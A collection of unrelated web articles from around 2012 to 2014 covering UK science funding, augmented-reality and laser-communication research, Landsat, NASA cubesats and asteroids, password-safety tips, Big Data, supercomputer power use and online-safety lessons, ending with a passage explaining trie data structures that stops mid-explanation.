+ establish a Global Collaborative Space Programme. The government will introduce a Global Collaborative Space Programme as an international pillar to our national space policy. A fund of £80 million over five years will enable UK scientists and companies to build stronger links with emerging powers in developing space capabilities and technology
+ ensure that UK industry and the wider public benefit from the development of driverless cars including a review, reporting by end 2014, to ensure the legislative and regulatory framework supports the world’s car companies to develop and test driverless cars in the UK, and a prize fund of £10 million for a town or city to develop as a test site for consumer testing of driverless cars
+ establish the Higgs Centre at Edinburgh University, named in honour of British Nobel laureate Peter Higgs. The centre will provide cutting edge academic instrumentation and big data capabilities to support high tech start ups and academic researchers specialising in astronomy and particle physics
+ invest £5 million during 2014-15 in a large scale electric vehicle-readiness programme for public sector fleets. The programme aims to promote the adoption of ultra low emission vehicles, demonstrating clear leadership by the public sector to encourage future wide-spread acceptance
Source: 2013 Autumn Statement | <urn:uuid:ff68dbc7-d299-4cef-8e60-222a97dc7781> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/12/11/uk-invests-270-million-quantum-computing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00493-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.928808 | 640 | 2.90625 | 3 |
Take a picture, and 4D app gives you the details
- By Patrick Marshall
- Feb 05, 2013
Second of four parts
Imagine taking a picture of an unfamiliar building or a piece of machinery and then having the picture tell you what’s inside the building or how that machine works. That’s part of the idea behind Hybrid 4-Dimensional Augmented Reality (HD4AR), a project of the MAGNUM Group at Virginia Tech University.
The project, led by Jules White, a professor of electrical and computer engineering at the university, can use a smart phone’s sensors, geotagging features, camera and video and audio recorders to augment situational awareness for first responders, construction crews or the public.
When it receives an image, HD4AR draws on a database of information to deliver annotated data to images on the phones. A user might, for example, take a photo of a piece of equipment. HD4AR would locate a similar image in its database and then deliver attached data — such as labels for the dials and levers on the equipment and perhaps a link to a user manual — to be superimposed on the image on the user’s cell phone. Or, send HD4AR a photo of a downtown street and it would be returned with buildings and stores identified.
“The idea behind this project is to create a framework where, when there was a disaster, people who were trapped in different areas could be using their smart phones to essentially provide situational awareness data to first responders or other citizen scientists in the area,” White said. “It can be image data, taking pictures of things, in-capture audio, video, accelerometer data, these types of things. From our perspective it was more about capturing that data, geo-tagging it all, and having it centralized in a location that first responders could look through.”
HD4AR also is designed as a tool for construction sites, taking the place of all those design drawings, but the framework also holds value for consumers. Suppose you go out in the morning and find your car battery needs a jump-start — and, as luck would have it, jump-starting a car is not something you know how to do. “So you take a photo of your engine and then on your photographs we will figure out where the positive and negative terminals are on the battery and we will annotate your photograph," White said.
The information flow goes both ways, too. “Anybody can add to the database using their phone,” he said. “From those photos we will build a crude 3-D model. So when the user goes into the photo and begins annotating it, drawing in information, we then figure out where on the 3-D model those notes go.
“When that information is saved in the database and when a new photo is taken — with a completely different angle and orientation — we can figure out which of those annotations that the first person created should be visible in the second person's photograph and then render them into that place in the photograph.”
The biggest challenge was to accommodate the processing and matching of photos taken from different angles, at different times of day and with physical changes over time. “We designed all the algorithms to be able to handle change and ambiguity in the images,” White said, citing as examples obstructions such as people walking in front of the camera or walls that change over time.
“We can tolerate a large amount of change before things start giving us trouble,” he said. “A wall may double in height and we can still often recognize that wall based on the original imagery that we have of it.”
White said the technology, which received an Innovation Award at January’s Consumer Electronics Show in Las Vegas, has been licensed to a startup company, PAR Works Inc.
The Virginia Tech group has been working on other innovative ways to manage mobile devices, including a modified version of the Android operating system that lets admins set rules for when users can access data or run certain apps, according to such factors as their location or the time of day.
PREVIOUS: Smart phones as sensors: locating snipers, or parking spots
NEXT: When smart-phone technology hits the wall | <urn:uuid:f48d62d0-5989-4a1f-af48-9affe6640ab2> | CC-MAIN-2017-04 | https://gcn.com/articles/2013/02/05/4d-app-gives-annotated-details-pictures.aspx?admgarea=TC_EMERGINGTECH | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00401-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955284 | 888 | 2.625 | 3 |
Not all of the programs operated by the U.S. government are household names, like Social Security or “Obamacare.” But some, even if little-known, are world-historic in scope and vision. One of these is the Landsat program.
Since 1972, the Landsat program has collected satellite data about the surface of the Earth. Eight satellites, now, have been built and shot toward space, some lasting far longer than they were expected to, one failing to reach orbit. In May, the Landsat program gained its newest satellite, Landsat 8. It has been producing imagery through the summer.
The Landsat program is the oldest continuously-operated program of its type, anywhere. Its satellites have created a precious and irreplaceable archive, and to sever the continuity of that archive would be a tremendous loss for science. It would also be a problem for the businesses in agriculture and forestry which use its data extensively.
So how will the government shutdown affect the Landsat program?
Landsat 7 and 8, the two satellites still operational, will “continue mission essential operations,” the U.S. Geological Survey announced. This means they’ll sense the Earth — which, since they’re already up in orbit, is relatively cheap for the government — and beam those data down to Earth.
Once on Earth, the data will be archived by the United States Geological Survey. It won’t be processed into the kind of data that scientists and businesses are used to working with, though, until after the government restarts. The data may also not be available at all online until then, too.
So the government shutdown, in the short term, will do little to hinder the Landsat program and the invaluable data it creates. It will introduce inefficiencies, though, and those will benefit no one. | <urn:uuid:b4728744-fbe1-45b1-a0be-f3a1e712d29f> | CC-MAIN-2017-04 | http://www.nextgov.com/defense/2013/10/how-shutdown-will-affect-one-quiet-crucial-set-satellites/71110/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00273-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950518 | 382 | 3.640625 | 4 |
NASA recently said it has picked three of the 11 cubesats it will send along with the first Space Launch System (SLS) rocket which could blast off in the 2017/2018 timeframe.
The 70-metric-ton SLS will stand 321 feet tall, offer 8.4 million pounds of thrust at liftoff, weigh 5.5 million pounds and carry 154,000 pounds of payload. The first SLS mission—Exploration Mission 1—in 2017 will launch an unmanned Orion spacecraft to demonstrate the integrated system performance of the SLS rocket and spacecraft prior to a mission with astronauts onboard.
+More on Network World: Graphene is hot, hot, hot+
Onboard the mission and tucked inside the ring connecting Orion to the top propulsion stage of the SLS will be 11 self-contained small satellites, each about the size of a large shoebox, NASA said.
“About 10 minutes after Orion and its service module escape the pull of Earth’s gravity, the two will disconnect and Orion will proceed toward the moon. Once Orion is a safe distance away, the small payloads will begin to be deployed, all at various times during the flight depending on the particular missions. No pyrotechnic devices will be a part of the payloads and each will be ejected with a spring mechanism – similar to opening a lid on a toy jack-in-the-box.
These cubesats are nano-satellites designed to be efficient and versatile. The masses of these secondary payloads are light -- no heavier than 30 pounds (14 kilograms) -- and will not require any extra power from the rocket to work. They will essentially piggyback on the SLS flight, providing what otherwise would be costly access to deep space,” NASA said.
The first three cubesats include:
The BioSentinel: The BioSentinel mission will be the first time living organisms have traveled to deep space in more than 40 years and the spacecraft will operate in the deep space radiation environment during its 18-month mission. BioSentinel will use yeast to detect, measure and compare the impact of deep-space radiation on living organisms over long durations beyond low Earth orbit (LEO). Since the unique deep space radiation environment cannot be replicated on or near Earth, the BioSentinel mission is one way to help inform us of the greatest risks to humans exploring beyond LEO, so that appropriate radiation protections can be developed and those dangers can be mitigated, NASA stated.
NEA Scout: Near-Earth Asteroid Scout will perform reconnaissance of an asteroid using a cubesat and solar sail propulsion [via the Largest solar sail – 85 meters -- ever deployed by the US space program], which offers navigation agility during cruise for approaching the target. Propelled by sunlight, NEA Scout will flyby and observe a small asteroid (<300 feet in diameter), taking pictures and observing its position in space, the asteroid’s shape, rotational properties, spectral class, local dust and debris field, regional morphology and regolith properties. The data collected will enhance the current understanding of asteroid environments, NASA said.
Lunar Flashlight: Resources at destinations in space, such as atmospheres, water ice and regolith, can be broken down into their component molecules and used as building materials, propellant, oxygen for humans to breathe and drinking water. This capability, known as in-situ resource utilization is most useful for human explorers if the ISRU “power plants” are deployed to locations that are rich in the required resources. NASA’s Lunar Flashlight will demonstrate this scouting capability from lunar orbit by performing multiple passes of the surface to look for ice deposits and identifying favorable locations for in-situ resource extraction and utilization. Lunar Flashlight will use a large solar sail, similar to the NEA Scout sail, to reflect sunlight and illuminate permanently shadowed craters at the lunar poles. A spectrometer will then observe the reflected light to measure the surface water ice. The spacecraft will make repeated measurements over multiple points in the craters, creating a map of the surface ice concentration, NASA said.
It will be interesting to see if these solar sail propulsion systems actually make it to the missions as few have been tested in space. The Japan Aerospace Exploration Agency‘s IKAROS (Interplanetary Kite-craft Accelerated by Radiation Of the Sun) mission being the first successful sustained use of the technology in 2010. NASA’s Sunjammer solar sail test has been delayed a number of times in the past but funding for the project continues to appear in the space agency’s budget plans.
The other eight cubesat missions/slots have not been selected yet.
A report issued this week claimed that a Russian cybercrime group stole 1.2 billion usernames and passwords from 420,000 websites.
While some security experts question the report’s findings, Symantec asserts the potential threats are important to take seriously, and recommends consumers take five steps now to protect their most sensitive password protected information:
Pay special attention to your email credentials: A lot of users fail to recognize that their email account can be a front door to their entire digital life. Think about how many times you may have reset your password on some other site and the recovery link is sent to your email account. In addition, avoid opening emails from unknown senders and clicking on suspicious email attachments; exercise caution when clicking on enticing links sent through email, instant messages, or posted on social networks; and do not share confidential information when replying to an email.
Change passwords on important sites: It’s a good idea to immediately change passwords for sites that hold a lot of personal information, financial details, and other private data. Cyber criminals who have your credentials could try to use them to access more information on these accounts. This is particularly true if you have used the same password on multiple sites. Attackers will often try to use stolen credentials on multiple sites.
Create stronger passwords: When changing your password, make sure that your new password is a minimum of eight characters long, and that it doesn’t contain your real name, username, or any other personally identifying information. The best passwords include a combination of uppercase and lowercase letters, numbers, and special characters; one way to generate such a password is sketched after these tips.
Don’t re-use passwords: Once a hacker has your account information and credentials, they’ll try to use it to gain access to all your accounts. This is why it’s important to create a unique password for each account. If you vary your passwords across multiple logins, they won’t be able to access other sites with the same information.
Enable two-factor authentication: Many websites now offer two-factor (or two-step) authentication, which adds an extra layer of security to your account by requiring you to enter your password, plus a code that you will receive on your mobile device via text message or a token generator to login to the site. This may add complexity to the login process, but it significantly improves the security of your account. If nothing else, use this for your most important accounts.
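A minimal sketch of what a password generator meeting the criteria above might look like, using Python's standard `secrets` module; the 12-character default length and the particular symbol set are illustrative choices, not a recommendation from Symantec:

```python
# Generate a random password with at least one uppercase letter, one
# lowercase letter, one digit, and one special character.
import secrets
import string

def generate_password(length: int = 12) -> str:
    if length < 8:
        raise ValueError("use at least eight characters")
    pools = [string.ascii_uppercase, string.ascii_lowercase,
             string.digits, "!@#$%^&*"]
    # Guarantee one character from each required class...
    chars = [secrets.choice(pool) for pool in pools]
    # ...then fill the rest from the combined alphabet.
    alphabet = "".join(pools)
    chars += [secrets.choice(alphabet) for _ in range(length - len(chars))]
    secrets.SystemRandom().shuffle(chars)
    return "".join(chars)

print(generate_password())
```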
The average user has 26 password-protected accounts but typically uses only five different passwords, says Symantec. In 2013, the two most common passwords were “123456” and “password.”
Consumers are experiencing password fatigue, and are resistant to regularly updating their passwords. A Symantec survey indicated that 38 percent of people would rather clean a toilet than come up with a new password.
The number one cause of breaches and compromised records in large organizations is stolen credentials, and research asserts that 80 percent of data breaches could have been eliminated with the use of two-factor authentication. | <urn:uuid:7ffd9118-bd89-4bfb-88a9-931fffd3958c> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2014/08/08/five-steps-to-take-to-protect-your-passwords/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00237-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.926731 | 625 | 2.953125 | 3 |
For years, the military has looked for a communications technology that can't be intercepted. Technology has advanced to where transmitting morse code-like messages isn't terribly useful or secure, and laying down ethernet cables in a war zone often is impractical or impossible.
But lasers could be the answer.
An infrared laser system called free space optical communications is being developed by the Air Force Research Lab at Wright-Patterson Air Force Base in Ohio and Fayetteville, Ark.-based Space Photonics. The beam is so narrow that it cannot be snooped on unless the snooper is directly in the beam's path, in which case the signal will stop. An attempt to intercept and retransmit the signal to fool the system into continuing transmission likely wouldn't work because the system functions as a “line of sight” device.
"It's inherently secure," said Terry Tidwell, chief engineer at Space Photonics, which recently signed a deal to commercialize its technology and sell it to the Department of Defense, NBC News reported. High bandwidth is another benefit to laser communications – while Wi-Fi signals can transmit megabits of data each second, an infrared laser beam can carry thousands of times more data.
Other companies are also picking up on the capabilities of laser communication technology, such as ITT Exelis, which received a $7 million contract to finish developing a ship-to-shore communications system for the Navy. By the end of next year, a company official said, the system should have a range of about 12 miles.
Laser-based communications systems like these were first proposed in the 1970s, but their use was cost-prohibitive, and fiber-optic cable was found to be a more practical alternative. Current laser technology is limited to several miles of transmission through air, but the range can be extended to about 120 miles with the use of aircraft at high altitude. Environmental factors, like fog, are still seen as technical barriers to the technology, but researchers have said they believe there is potential worth exploring.
OpenStreetMap is a marvel of modern crowdsourcing. Since its creation in 2004, DIY cartographers – typically armed with GPS devices or satellite photography – have been slowly mapping the world's road networks and landmarks to create a free alternative to proprietary geographic data that can then support tools like trip planners. The process, which began in the U.K., is painstaking and piecemeal, and nearly a decade into it, more than a million people have contributed a sliver of road here or a surveyed cul-de-sac there.
Academics refer to this kind of collaborative mapmaking as "volunteered geographic information," and OpenStreetMap is one of the most successful examples of it out there. Research into the system suggests that these amateur maps are impressively accurate in communities dense with contributors (like Germany: Germans love OpenStreetMap). But until now, it's been much easier to assess how good these maps are than to ask how they got that way.
Now, researchers are getting much better at processing OpenStreetMap's data to access its history. The above historic timelapse comes from a study, published in the journal Spatial Statistics, that retraced the growth of OpenStreetMap networks in three areas of Ireland to understand how the networks are built. | <urn:uuid:f3e73f4b-d362-45d7-b3cc-4490dc3b1a9a> | CC-MAIN-2017-04 | http://www.nextgov.com/big-data/2013/03/mapping-growth-openstreetmap/61929/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00053-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.961744 | 258 | 3.671875 | 4 |
NASA continues to get a better handle on the asteroids buzzing around in space, saying today that there are roughly 4,700 potentially hazardous asteroids, or, as NASA calls them, PHAs. NASA says these PHAs are a subset of a larger group of near-Earth asteroids but have the closest orbits to Earth's - passing within five million miles (or about eight million kilometers) - and are big enough to survive passing through Earth's atmosphere and cause damage on a regional, or greater, scale.
NASA points out too that ''potential'' to make close Earth approaches does not mean a PHA will impact the Earth. It only means there is a possibility for such a threat.
RELATED: The sizzling world of asteroids
The new numbers come from asteroid observations made by NASA's Wide-field Infrared Survey Explorer (WISE) satellite, which looked at objects that orbit within 120 million miles of the sun, into Earth's orbital vicinity, NASA said. WISE scanned the celestial sky twice in infrared light between January 2010 and February 2011, continuously snapping pictures of everything from distant galaxies to near-Earth asteroids and comets. It has since entered hibernation mode, NASA stated. The asteroid-hunting portion of the WISE mission, called NEOWISE, has seen more than 100,000 asteroids in the main belt between Mars and Jupiter, in addition to at least 585 near Earth, NASA noted.
Specifically, NASA said NEOWISE sampled 107 PHAs to make predictions about the population as a whole. Findings indicate there are roughly 4,700 PHAs, plus or minus 1,500, with diameters larger than 330 feet (about 100 meters). So far, an estimated 20 to 30% of these objects have been found, NASA stated. While previous estimates of PHAs predicted similar numbers, they were rough approximations, NASA said.
"The NEOWISE analysis shows us we've made a good start at finding those objects that truly represent an impact hazard to Earth," said Lindley Johnson, program executive for the Near-Earth Object Observation Program at NASA Headquarters in Washington. "But we've many more to find, and it will take a concerted effort during the next couple of decades to find all of them that could do serious damage or be a mission destination in the future."
Asteroids have been in the news a lot lately. It has been widely reported that NASA could announce this month a manned project to land on an asteroid in the future. And in April Google executives Larry Page and Eric Schmidt and filmmaker James Cameron said they would bankroll a venture to survey and eventually extract precious metals and rare minerals from asteroids that orbit near Earth. Planetary Resources, based in Bellevue, Wash., initially will focus on developing and selling extremely low-cost robotic spacecraft for surveying missions.
And of course Doomsday 2012 scenarios have abounded in the news for a long time. NASA has spent some time shooting these theories down - including one of a world ending asteroid. "The Earth has always been subject to impacts by comets and asteroids, although big hits are very rare. The last big impact was 65 million years ago, and that led to the extinction of the dinosaurs. We have already determined that there are no threatening asteroids as large as the one that killed the dinosaurs. For any claims of disaster or dramatic changes in 2012, where is the science? Where is the evidence? There is none, and for all the fictional assertions, whether they are made in books, movies, documentaries or over the Internet, we cannot change that simple fact," NASA stated.
You hear it almost as often as "cloud computing" these days. Around every corner of the internet is another headline talking about "Big Data", but what is it, exactly? When data sets grow so large and complex that they are difficult to manage with traditional databases or processing tools, that's Big Data. Almost every organization I talk to has their own definition of what they think encompasses Big Data: SMBs mention anything in the multi-terabyte range, enterprises are eyeing petabytes and exabytes, and meanwhile the government (like the NSA's massive Utah data center) are sorting through zettabytes and yottabytes. The use of cloud computing to manage Big Data is on the rise, too.
How much is a yottabyte? To store (not process, but save) a yottabyte of information on the most compact microSDXC cards, you would need enough cards to build the Pyramid of Giza.
An infographic from Intel titled “What happens in an Internet Minute” helps put Big Data into perspective. This graphic illustrates that in one minute 639,800 gigabytes of global IP data is transferred, equivalent to 204 million emails sent, 61,141 hours of music streamed over Pandora, six million Facebook views from 277,000 logins, over two million Google searches, or 1.3 million video views with 30 hours of video uploaded to YouTube. The growth continues in a staggering manner. Today there are as many network devices as the global population. By 2015 that number will grow twice the global population. That means in just two years it would take a human five years just to view all of the video data crossing IP networks each second.
Further contributing to this growth is the rise of M2M traffic or Machine-to-Machine communication. You may have seen the Cisco commercials mention the term of “the internet of things”, covering everything that can be connected to a network, from talking light switches to automated doors to shopping carts all centrally stored and controlled via network. This is M2M in action. One division of GE is equipping their new turbines with 250 sensors in each of its 5000 turbines, enabling real-time data processing via centralized monitoring facility, where they are on the lookout for leading issues, such as temperature on the bearings, vibrations, exhaust and other areas that signal the health of the machine. When readings fall outside safe predefined levels, GE technicians can get a jump start on fixes before mechanical errors or breakdown occur, enabling power to be sold on a per-hour basis. GE states that “for some customers just one hour of stoppage can cost $2 million in electrical output”. With those kinds of costs, would you rather have a machine notify you before an outage that something is wrong, or watch a technician with a toolbox diagnosing a busted turbine? Big Data can take it one step further: through predictive analysis, technicians can even discover when a turbine might fail and what steps to take to prevent that failure.
With all this data being generated, the largest problem Big Data presents is how best to sort through and process everything. Data storage is only one obstacle. You also have to process and provide analysis. There are many software companies creating products manufacturers use to collect data from their machines, analyze it, and integrate the data into their business systems. The manufacturers can then use this machine data to understand usage and behavior, build models, and figure out new ways to drive value. While these Enterprise Resource Planning (ERP) and other tools have been common in manufacturing for some time, this is now true across all sectors.
At Green House Data, we see many organizations starting to leverage MapReduce algorithms and Hadoop software frameworks to pull value out of their data. For example, it’s not uncommon for a hospital to query their data for “the number of times a women 30-40 received a mammogram in Wyoming”. Car dealers may search for the “age and sex of sedan buyers per day of the week” to help their sales force discover when they should market their new sedans and what demographic to focus on.
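As a rough illustration of the map-and-reduce pattern behind such queries, here is a self-contained Python sketch; the record layout and the hospital-style query are assumptions for the example, and a real deployment would run the same two functions in parallel across a Hadoop or Spark cluster rather than in a single process:

```python
# Count, per state, how many women aged 30-40 received a mammogram.
from collections import defaultdict

records = [
    {"state": "WY", "procedure": "mammogram", "age": 34, "sex": "F"},
    {"state": "WY", "procedure": "mammogram", "age": 52, "sex": "F"},
    {"state": "CO", "procedure": "mammogram", "age": 38, "sex": "F"},
    {"state": "WY", "procedure": "x-ray",     "age": 31, "sex": "M"},
]

def map_phase(record):
    # Emit a (key, 1) pair only for records matching the query.
    if (record["procedure"] == "mammogram"
            and record["sex"] == "F"
            and 30 <= record["age"] <= 40):
        yield (record["state"], 1)

def reduce_phase(pairs):
    # Sum the counts emitted for each key (here, per state).
    totals = defaultdict(int)
    for key, count in pairs:
        totals[key] += count
    return dict(totals)

pairs = [pair for record in records for pair in map_phase(record)]
print(reduce_phase(pairs))   # {'WY': 1, 'CO': 1}
```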
Whether you're dealing with terabytes or exabytes of data, new forward-thinking ideas are needed to keep up with the amount of data being generated and the resources needed to store and process it. For a cost-effective solution, small and large businesses alike are frequently turning to the cloud to provide the resources needed to deal with Big Data, as cloud deployments enable fast-scaling, easily implemented and low-cost infrastructure, ideal for experimenting with and crunching ever-increasing data sets. Despite its murky definition, what Big Data boils down to is improving efficiency and increasing revenue by tracking and analyzing every aspect of your business. A valuable tool, indeed.
Posted By: Cortney Thompson | <urn:uuid:bfb76b62-6bc8-4c45-a343-8d92fc5e3bec> | CC-MAIN-2017-04 | https://www.greenhousedata.com/blog/getting-to-the-bottom-of-big-data | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00567-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943188 | 977 | 3.046875 | 3 |
Over the years we've heard people warning/lamenting/complaining about Earthlings leaving their junk all over this part of the solar system, whether it's dead satellites floating through space or abandoned equipment left on the surface of the moon or a nearby planet. But now scientists are raising the prospect of us inadvertently transporting to Mars bacteria that is able to survive. Two microbiologists at the University of Florida recently tested some Earth microbes under harsh Mars-like conditions. Here's how Discovery.com's Markus Hammonds describes it:
Wayne Nicholson and Andrew Schuerger ... didn’t choose just any old bacteria, though. The microbes in question were taken from samples of Russian permafrost, collected over 12 meters (40 feet) below ground. These bacteria were first nurtured for 28 days in nutrient-rich dishes kept at normal Earth conditions. Then around 10,000 colonies of the bacteria were subjected to 30 days of conditions intended to mimic Mars, at temperatures of 0°C (32°F) and a pressure of just 7 millibars — the same pressure on the surface of Mars. Six of the bacterial colonies tested, containing a strain known as carnobacterium, managed to grow under these harsh conditions. In fact, surprisingly, the carnobacterium colonies grew better at low pressures and without oxygen than they did under more normal conditions. The reasons why aren’t entirely clear.
As Hammonds points out, six out of 10,000 isn't much. But it's six more than zero. Further, it was "the first time Earth microbes have ever been successfully grown at such a low pressure," he writes. No matter how much we try, it's virtually impossible to guarantee that every piece of equipment we send into space is fully sterilized. Something's going to make it on board (indeed, some have expressed fears that Curiosity Rover may have transported bacteria in its wheels). And its chances of survival in a harsh, alien environment will be exceedingly slim. Except for the mutant strain, of course.
The CAD Operator's role is to prepare complex drawings, diagrams, and documents using computer-aided design (CAD) software within the organization. This includes developing CAD files based on notes, sketches, engineering schematics, technical guides, vendor information, and so on. The CAD Operator will produce CAD files in a timely and accurate fashion. This position may include duties involving artwork and other graphical elements. | <urn:uuid:77b0a8aa-0039-49d0-b7a4-23c99ce43724> | CC-MAIN-2017-04 | https://www.infotech.com/research/cad-operator | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00532-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.89645 | 104 | 2.578125 | 3 |
In a thought-provoking piece over at ZDNet, Numerical Algorithms Group’s Andrew Jones takes a look at the supercomputing power consumption equation, examining whether its current trajectory might not be so untenable.
There are a range of estimates for the likely power consumption of the first exaflops supercomputers, which are expected at some point between 2018 and 2020. But probably the most accepted estimate is 120MW, as set out in the Darpa Exascale Study edited by Peter Kogge (PDF).
At this figure, the supercomputing community panics and says it is far too much — we must get it down to between 20MW and 60MW, depending who you ask — and we worry even that is too much. But is it?
What follows is a comparison of today’s largest supercomputers with their closest kin, major scientific research facilities.
In Jones’ opinion:
[T]he largest supercomputers at any time, including the first exaflops, should not be thought of as computers. They are strategic scientific instruments that happen to be built from computer technology. Their usage patterns and scientific impact are closer to major research facilities such as Cern, Iter, or Hubble.
Thinking of the big supercomputers that way, their power consumption and other costs — construction, operation, and so forth — are comparable to other major research centers and not that outrageous, concludes Jones.
Jones also tackles the subject of whether it makes sense to continually improve and replace systems every couple of years (as we currently do) or whether it would offer more value to society to collaborate on the construction of one mega-supercomputer every decade – putting ten years of resources into it, and then relying only on that system for ten years. There are, of course, pros and cons to each path. Because supercomputing performance increases exponentially, the first option results in a greater number of exflops per year, but also think of the resources saved with the second option by not having to continually rewrite and validate code and the value to society in having a 2030-era system ten years ahead of schedule.
Jones is not sold on either path, but wonders why we are so set on the first option without giving some consideration to the second. Check out the full article for more in-depth treatment of these ideas. | <urn:uuid:f13f00c9-5740-496e-a7a2-501a980b48c2> | CC-MAIN-2017-04 | https://www.hpcwire.com/2010/09/24/supercomputing_energy_use_getting_a_bad_rap/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00256-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939701 | 490 | 2.828125 | 3 |
The seventh-grade classroom at Aptos Middle School buzzed with animated kids, many of whom whispered to friends and shot curious looks at the visitors scattered around their classroom.
Local politicians, the superintendent of schools and media visited the classroom of 25 kids last Friday to watch a special lesson designed to teach children how to protect themselves online. All 55,000 elementary to high school students in San Francisco got the lesson on the same day, part of fulfilling a new requirement to a U.S. law called the Children's Internet Protection Act (CIPA). To get federal funding, public schools have to instruct students how to protect their privacy, avoid cyberbullying and practice ethical behavior online.
The U.S. is the only nation that requires online safety instruction at public schools, but other countries may soon join it. The European Commission is mulling over a law that would mandate educating kids about online safety, and in the UK, newly appointed adviser on childhood, Claire Perry, is talking about the need to make online safety part of the public school curriculum.
But much of what is taught about online safety is not rooted in evidence, according to Stephen Balkam, CEO of the Family Online Safety Institute, a global organization based in Washington, D.C.
"There's precious little research on the effectiveness of online safety education," said Balkam, who also worries that a fear-based message about the dangers online can overlook the Internet's many benefits.
The U.S. Department of Education cites a 2008-2009 poll that shows 28 percent of students reported being bullied at school, while 6 percent were bullied online.
The next public event to draw attention to kids' use of the Internet is coming up on Feb. 5, when the EU and U.S. will observe Safer Internet Day. | <urn:uuid:c3f8decf-7618-41af-9cf7-b12db702bf6f> | CC-MAIN-2017-04 | http://www.itworld.com/article/2715278/networking-hardware/a-lesson-in-cyberbullying.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00558-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957205 | 383 | 3.171875 | 3 |
What is Intelligent Word Recognition?
Intelligent Word Recognition uses artificial intelligence to recognize whole words in a document instead of individual characters (which is how Optical Character Recognition / OCR works). For example, when an OCR system is extracting the word “dog” from a document, it will recognize “d”, “o”, and “g”. IWR will match the letters to a dictionary and extract the whole word, “dog” based on pattern recognition and matching algorithms.
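As a rough illustration of the whole-word idea (not Captricity's actual algorithm), the sketch below compares a noisy OCR string against a small dictionary and keeps the closest entry; the dictionary and the `difflib`-based similarity measure are illustrative assumptions:

```python
# Match raw OCR output against a word list instead of trusting each character.
import difflib

DICTIONARY = ["dog", "dot", "do", "fog", "log"]

def recognize_word(ocr_output):
    """Return the dictionary word most similar to the raw OCR string."""
    matches = difflib.get_close_matches(ocr_output, DICTIONARY, n=1, cutoff=0.0)
    return matches[0] if matches else ocr_output

print(recognize_word("d0g"))   # 'dog' -- the per-character error is absorbed
```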
Captricity delivers more than both approaches.
Intelligent Word Recognition does not recognize names and numbers not housed in a catalog or dictionary. While Captricity uses OCR algorithms as a first pass on every data capture job, we have tweaked our algorithms with machine learning and pattern recognition to deliver higher accuracy than standard OCR systems. But what really sets Captricity apart from IWR and OCR is crowdsourcing. To ensure accuracy, every data field is verified by between one and five people, enabling our stellar 99% accuracy rate.
Captricity and crowdsourcing
Captricity uses crowdsourcing to verify the data contained in every field we capture. When customers set up their initial job, they upload a blank version of the document they need extract information from. They then use our system to delineate which fields need to be digitized. Each form is “shredded” into distinct fields and each field is verified by one or more people. Since no one person can see more than one field from each document, privacy is maintained. | <urn:uuid:2d4f5a68-b22c-4db7-977d-4630f90af63e> | CC-MAIN-2017-04 | http://captricity.com/intelligent-word-recognition/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00376-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.919763 | 327 | 3.125 | 3 |
A trie is a special kind of tree data structure in which items are stored and accessed based upon their key value alone, not based upon their key value in relation to others in the tree. In contrast, recall that a binary search tree uses a greater-than or less-than relationship between keys in the tree to determine where a new insertion would be placed. In tries, the new insertion's place is predetermined based on its key value. For this reason a trie is somewhat of a cross between a tree and a hash table.

Tries can only be used when the range of valid keys to be stored is known up-front. To store a new item in a trie, that item's key value is somehow broken down into components. If, for example, the item to be stored is a string, a logical way to break its value down is by letter. For a number, perhaps a good way to break down the key value is by digits in its binary representation. Every internal node in a trie can have as many child nodes as the number of items in the alphabet you are storing. That is, if you are traversing on English letters each node can have up to 26 children. If you are traversing on binary digits, each node can have two children, 0 or 1.
Imagine we have a trie in which we are storing strings. We wish to store the new item ``dog'' in the trie. From the root node we follow the ``d'' edge and arrive at a child node. The only data stored in leaves under this child node are words that begin with the letter ``d''. Next, we traverse along the ``o'' link from the ``d'' node. We reach yet another internal node under which only words which start with the prefix ``do'' are stored. Finally suppose we find that there is no ``g'' link off the ``do'' node. We create one and store ``dog'' at this new leaf node.
Likewise, if we want to store the number six (6) in a numeric trie, we might convert six to its binary representation (110). From the first node we follow the ``1'' edge. Next we traverse down the ``1'' edge again. And finally, following the ``0'' edge, we store the value six in a leaf node that lies along the ``110'' path from the root node.
Any path from the root to a leaf in a trie corresponds to the value of the item stored at the leaf node reached.
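For concreteness, here is a minimal Python sketch of the insertion and lookup just described, using a dictionary of child links per node; the names `TrieNode`, `insert`, and `contains` are illustrative rather than taken from this text:

```python
class TrieNode:
    def __init__(self):
        self.children = {}   # edge label (single letter) -> child TrieNode
        self.value = None    # payload stored at a terminal node

def insert(root, key, value):
    """Walk edge-by-edge along the letters of `key`, creating
    missing links, and store `value` at the final node."""
    node = root
    for letter in key:
        node = node.children.setdefault(letter, TrieNode())
    node.value = value

def contains(root, key):
    """Follow the path spelled by `key`; the item is present only if
    every edge exists and the final node holds a value."""
    node = root
    for letter in key:
        if letter not in node.children:
            return False
        node = node.children[letter]
    return node.value is not None

root = TrieNode()
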